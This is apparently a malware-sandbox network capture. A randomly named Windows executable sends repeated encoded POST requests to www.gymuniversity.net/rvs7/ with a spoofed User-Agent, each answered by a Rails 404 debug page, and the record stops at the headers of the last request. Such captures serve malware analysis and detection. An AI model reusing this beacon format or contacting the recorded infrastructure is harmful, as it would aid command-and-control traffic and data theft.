                                                  Aug 16, 2024 09:33:19.215466022 CEST1236INData Raw: d9 5a a6 05 2b cc 26 65 05 27 4e 97 1b 13 b2 83 db c3 a6 ed 20 ba 94 fe 4b d8 5b 3a dd 3d 50 3a 73 51 be 8d 0d 0c d7 22 8f 58 84 dc 06 2d 95 3e b8 44 d8 fb 6d 3b ac 24 57 7b 5a 27 5b 43 dc 29 f7 09 21 a7 03 f2 0a 7b 5b 95 a5 09 fc 04 86 f7 03 b7
                                                  Data Ascii: Z+&e'N K[:=P:sQ"X->Dm;$W{Z'[C)!{[+yer}>lqB~9Q%dkF7tN/@'\JCuL<K:^qbl9q 1+pc~6;HsXNK`C!n'FI79:5EGMs~V
                                                  Aug 16, 2024 09:33:19.215502024 CEST1236INData Raw: 4c 11 97 45 57 40 3d 76 e0 cc 31 71 f5 a7 8c d1 9d a9 6b da 4b e4 15 56 5e 57 b2 cf 06 d4 85 af d6 aa f0 e9 6b c4 38 a0 45 c2 58 14 23 1b 61 51 81 af 49 98 c0 8d e4 94 da 75 8e 55 72 1d 4b 67 15 e9 e9 9f 7d 32 b1 57 bf 94 eb ac ba 28 c7 78 59 90
                                                  Data Ascii: LEW@=v1qkKV^Wk8EX#aQIuUrKg}2W(xY"rD&%fcx*+;&cn A'qoBC4Nc&+4J.YT(Am4W|4i<y7okd+B\+E4XB6Edf,^4d2`fW
                                                  Aug 16, 2024 09:33:19.215517044 CEST1224INData Raw: 04 26 50 7d 82 15 90 ae a5 98 c9 ae 13 05 5e ad 66 a9 30 e4 3f 83 3c e2 d3 88 04 ed d1 d2 52 b3 6b 08 e4 34 68 53 66 29 b6 68 50 1e d4 5b 74 a6 fe 3c 6f f9 b6 1d 90 f6 1c 0a b8 14 a4 38 35 91 81 02 b9 0d 1b d5 86 fa 7a ff 00 a4 cb 75 4e d5 7a 21
                                                  Data Ascii: &P}^f0?<Rk4hSf)hP[t<o85zuNz!uH<L'e,S@`b]_-90O}?k&{"x[v/0Z?HU:KjP?{o.+?0Ijp'wl|;,=&ff*
                                                  Aug 16, 2024 09:33:19.221544027 CEST1236INData Raw: 82 3c 72 a1 58 59 9e 01 34 b3 25 b4 fb 4c 44 59 cc 34 53 40 b2 73 1c b0 fb 01 9f f9 fa 33 f3 fb 03 0f d3 a5 47 17 ba ba 89 6f 40 38 90 7b 0b f1 a9 99 c5 6a 60 29 9e cb 66 bd 64 da 3e 1d 12 17 ba 3b a5 74 39 60 35 89 b7 90 4e a4 b8 b9 bc 1c 18 30
                                                  Data Ascii: <rXY4%LDY4S@s3Go@8{j`)fd>;t9`5N0e"jqJV>8)~u[?;>O?_~r{;/#waV6$NYpx1&[?TccmsmAxOt0l;ekX(;9


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.2249175216.40.34.41801980C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:33:29.348103046 CEST2472OUTPOST /rvs7/ HTTP/1.1
                                                  Host: www.gymuniversity.net
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.gymuniversity.net
                                                  Referer: http://www.gymuniversity.net/rvs7/
                                                  Content-Length: 2160
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Data Raw: 77 78 57 3d 5a 53 33 57 77 75 78 36 4d 79 32 4d 53 4c 41 57 46 61 65 77 75 58 6f 2f 7a 34 38 74 46 6a 48 64 2b 57 6a 59 76 63 6c 31 7a 47 61 41 35 6f 72 39 73 68 47 2b 79 47 71 58 35 41 36 4b 53 43 56 57 51 2b 57 42 65 6e 2f 6b 4e 41 70 48 2b 75 37 41 55 39 34 79 57 4f 59 41 2f 62 37 77 6e 7a 44 73 65 67 54 30 37 56 55 38 63 32 69 52 4f 45 6e 39 73 51 2b 57 6c 71 74 51 64 46 71 77 76 6a 34 71 48 38 79 70 31 2f 51 6a 41 44 56 77 47 55 78 41 34 4f 72 65 4a 65 33 36 42 6f 76 48 2f 77 6b 6b 63 39 46 4a 41 6c 63 4b 2f 6a 37 6a 61 64 72 73 33 7a 57 78 6c 78 55 61 4d 48 37 39 41 62 52 4b 67 48 62 73 74 78 32 6a 2f 58 34 70 77 50 6e 54 36 64 76 35 70 75 4c 39 71 47 78 66 33 32 72 50 4c 32 78 53 6b 4a 38 64 6e 30 79 38 61 6e 58 36 44 76 6c 56 54 64 4d 66 50 38 64 6c 54 5a 51 67 74 65 4b 43 67 6f 37 43 31 72 62 6e 30 6e 76 38 6b 77 33 32 6c 58 4f 59 71 61 70 47 55 44 50 31 63 66 4d 33 30 5a 4f 62 76 31 34 46 37 6a 78 66 75 72 73 58 78 77 69 75 76 45 48 38 43 5a 7a 64 61 5a 50 67 76 6c 4b 77 52 46 64 45 75 2f [TRUNCATED]
                                                  Data Ascii: wxW=ZS3Wwux6My2MSLAWFaewuXo/z48tFjHd+WjYvcl1zGaA5or9shG+yGqX5A6KSCVWQ+WBen/kNApH+u7AU94yWOYA/b7wnzDsegT07VU8c2iROEn9sQ+WlqtQdFqwvj4qH8yp1/QjADVwGUxA4OreJe36BovH/wkkc9FJAlcK/j7jadrs3zWxlxUaMH79AbRKgHbstx2j/X4pwPnT6dv5puL9qGxf32rPL2xSkJ8dn0y8anX6DvlVTdMfP8dlTZQgteKCgo7C1rbn0nv8kw32lXOYqapGUDP1cfM30ZObv14F7jxfursXxwiuvEH8CZzdaZPgvlKwRFdEu/XtdGv1RSjjM3s0zX2F40HtE2k8d/FCUpUp5V0fCj5KECN8kI7OoHEJdeY09AbEHyP+RbprrtlEMsowKn+cpcpy4MMSMitv6xK2jtpkx31X9ugHe1UpmfXRZUYoGX6G5fxTPr4XTUH3BxyLHeApv32tUO6Cx6s2dd0vshZUFQRXvrIHbpa0y06mZw7+RuWiiCR447zjeB1CsHfJT581o4aqL6lm8VuKQO0VbcsBKk697Z60kRnbtkxqaDWZD42xFChz/hyiGodbiG3BBZkl1NvdcENFByIDCFbpFkuSHwo7YuilqBEm3hxwPs26MiTD6gAbT14thhuLl8uWNR6OtotnoxGM+P3QWcudcGD1btN99sy3bnMrH8Zqe5UnxRCx2/Zsew/54ElxvSuP6bQ0SsyKdq1s2MD1OTJcClJ4LqTYRwRtjS1bU40iSGv9mxukQO7VtEc1goLlFBBQrzEot44tXLOt5fAYxnJeZt5R0gtYOiZLNXMksFf/i9xGM7kUrj2RrLavcl804jrqYtGUTsQ2a1HihQF8Qx/2ppqYskCpjQIWWj8MnAYWNCi6Yd8Cy1VEZ3+YG+nQ6NhG2SSAK9scqdEXUGu8PrdxsNs77y7krOry/hMIZXpqJ9N93nQFzvr5l8iQG1n9qHamdGNThvVjv8SG5YzmKm1r [TRUNCATED]
                                                  Aug 16, 2024 09:33:29.353080034 CEST112OUTData Raw: 34 38 5a 6c 37 64 62 2b 6b 49 65 54 55 6f 48 4b 6b 38 36 52 70 31 7a 4b 6d 63 47 43 6f 57 30 57 53 56 64 6b 48 52 35 64 39 74 44 4e 56 53 34 59 61 4d 72 66 33 34 61 46 59 73 33 63 67 34 53 69 70 72 56 43 4a 62 70 34 59 32 4e 4a 7a 53 4f 7a 46 32
                                                  Data Ascii: 48Zl7db+kIeTUoHKk86Rp1zKmcGCoW0WSVdkHR5d9tDNVS4YaMrf34aFYs3cg4SiprVCJbp4Y2NJzSOzF2X/uy+haNIceoAFKkCrcTdowMiYFAnr
                                                  Aug 16, 2024 09:33:29.940567970 CEST1236INHTTP/1.1 404 Not Found
                                                  content-type: text/html; charset=UTF-8
                                                  x-request-id: cdcb27b3-da02-4096-b5d1-f406d443117a
                                                  x-runtime: 0.043189
                                                  content-length: 20068
                                                  connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                  Aug 16, 2024 09:33:29.940583944 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                  Aug 16, 2024 09:33:29.940593958 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                  Aug 16, 2024 09:33:29.940612078 CEST648INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                                  Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                                  Aug 16, 2024 09:33:29.940623045 CEST1236INData Raw: 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 46 72 61 6d 65 77 6f 72 6b 20 54 72 61 63 65 3c 2f 61 3e 20 7c 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 69 64 65 28 26 23 33 39 3b 41 70 70
                                                  Data Ascii: 39;);; return false;">Framework Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Framework-Trace&#39;);show(&#39;Full-Trace&#39;);; return false;">Full Trace</a> <div id="Application-Trace" style="display:
                                                  Aug 16, 2024 09:33:29.940634012 CEST1236INData Raw: 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 76 65 73 75 70 70 6f 72 74 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60 74 61 67 67 65 64
                                                  Data Ascii: href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" data-fr
                                                  Aug 16, 2024 09:33:29.940644026 CEST1236INData Raw: 6c 65 77 61 72 65 2f 73 74 61 74 69 63 2e 72 62 3a 31 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31
                                                  Data Ascii: leware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engine.rb:5
                                                  Aug 16, 2024 09:33:29.940654993 CEST1236INData Raw: 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 22 20 68 72 65 66 3d 22 23 22 3e 6c 6f 67 72 61 67 65 20 28 30 2e 31 31 2e 32 29 20 6c
                                                  Data Ascii: &#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:i
                                                  Aug 16, 2024 09:33:29.940769911 CEST1236INData Raw: 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 6d 65 74 68 6f 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26
                                                  Data Ascii: data-frame-id="11" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="1
                                                  Aug 16, 2024 09:33:29.940782070 CEST1236INData Raw: 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 31 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 73 65 72 76 65 72 2e 72 62 3a 33 32 38 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 72 75
                                                  Data Ascii: s" data-frame-id="21" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.2249176216.40.34.41801980C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:33:31.888699055 CEST623OUTPOST /rvs7/ HTTP/1.1
                                                  Host: www.gymuniversity.net
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.gymuniversity.net
                                                  Referer: http://www.gymuniversity.net/rvs7/
                                                  Content-Length: 200
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Data Raw: 77 78 57 3d 5a 53 33 57 77 75 78 36 4d 79 32 4d 53 4b 41 57 44 50 79 77 76 33 6f 2f 6a 6f 38 74 4c 44 48 66 2b 57 76 36 76 5a 55 2b 7a 78 47 41 36 36 7a 39 73 54 75 2b 33 47 71 55 73 77 36 56 50 79 56 6d 51 2b 57 73 65 6e 44 6b 4e 41 4e 48 2b 4e 54 41 46 73 34 78 5a 65 59 4f 72 72 37 31 6e 7a 50 70 65 67 75 7a 37 56 38 38 63 31 32 52 50 41 4c 39 70 7a 57 57 33 71 74 57 62 46 72 70 76 6a 30 7a 48 38 69 68 31 38 30 6a 41 79 4a 77 47 42 46 41 39 64 44 65 48 2b 33 2f 4d 49 75 5a 30 68 6c 30 46 2f 42 65 4a 6b 41 6c 77 69 32 50 57 2f 2b 76 7a 43 6d 43 6c 52 77 4f 47 68 43 49 43 4c 45 45 34 51 3d 3d
                                                  Data Ascii: wxW=ZS3Wwux6My2MSKAWDPywv3o/jo8tLDHf+Wv6vZU+zxGA66z9sTu+3GqUsw6VPyVmQ+WsenDkNANH+NTAFs4xZeYOrr71nzPpeguz7V88c12RPAL9pzWW3qtWbFrpvj0zH8ih180jAyJwGBFA9dDeH+3/MIuZ0hl0F/BeJkAlwi2PW/+vzCmClRwOGhCICLEE4Q==
                                                  Aug 16, 2024 09:33:32.417577028 CEST1236INHTTP/1.1 404 Not Found
                                                  content-type: text/html; charset=UTF-8
                                                  x-request-id: ea8adc26-e34f-4563-b38d-a90a6d776e28
                                                  x-runtime: 0.055378
                                                  content-length: 18108
                                                  connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                  Aug 16, 2024 09:33:32.417596102 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                  Aug 16, 2024 09:33:32.417609930 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                  Aug 16, 2024 09:33:32.417692900 CEST672INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                                  Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                                  Aug 16, 2024 09:33:32.417702913 CEST1236INData Raw: 61 6d 65 77 6f 72 6b 20 54 72 61 63 65 3c 2f 61 3e 20 7c 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 69 64 65 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 68 69 64
                                                  Data Ascii: amework Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Framework-Trace&#39;);show(&#39;Full-Trace&#39;);; return false;">Full Trace</a> <div id="Application-Trace" style="display: block;"> <pre><co
                                                  Aug 16, 2024 09:33:32.417712927 CEST1236INData Raw: 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60 74 61 67 67 65 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74
                                                  Data Ascii: (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">acti
                                                  Aug 16, 2024 09:33:32.417723894 CEST1236INData Raw: 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 36 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29
                                                  Data Ascii: `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engine.rb:524:in `call&#39;</a><br>
                                                  Aug 16, 2024 09:33:32.417733908 CEST1236INData Raw: 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 22 20 68 72 65 66 3d 22 23 22 3e 6c 6f 67 72 61 67 65 20 28 30 2e 31 31 2e 32 29 20 6c 69 62 2f 6c 6f 67 72 61 67 65 2f 72 61 69 6c 73 5f 65 78 74 2f 72 61 63
                                                  Data Ascii: race-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a
                                                  Aug 16, 2024 09:33:32.417774916 CEST1236INData Raw: 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 6d 65 74 68 6f 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72
                                                  Data Ascii: ="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesuppor
                                                  Aug 16, 2024 09:33:32.417785883 CEST1236INData Raw: 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 73 65 72 76 65 72 2e 72 62 3a 33 32 38 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 72 75 6e 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22
                                                  Data Ascii: ef="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type
                                                  Aug 16, 2024 09:33:32.423173904 CEST1236INData Raw: 29 3b 0a 20 20 20 20 20 20 20 20 20 20 63 75 72 72 65 6e 74 53 6f 75 72 63 65 20 3d 20 65 6c 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20
                                                  Data Ascii: ); currentSource = el; } } } </script></div> <h2> Routes </h2> <p> Routes match in priority from top to bottom </p> <table id='route_table' class='route_table'> <thead>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.2249177216.40.34.41801980C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:33:34.431818962 CEST2472OUTPOST /rvs7/ HTTP/1.1
                                                  Host: www.gymuniversity.net
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.gymuniversity.net
                                                  Referer: http://www.gymuniversity.net/rvs7/
                                                  Content-Length: 3624
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
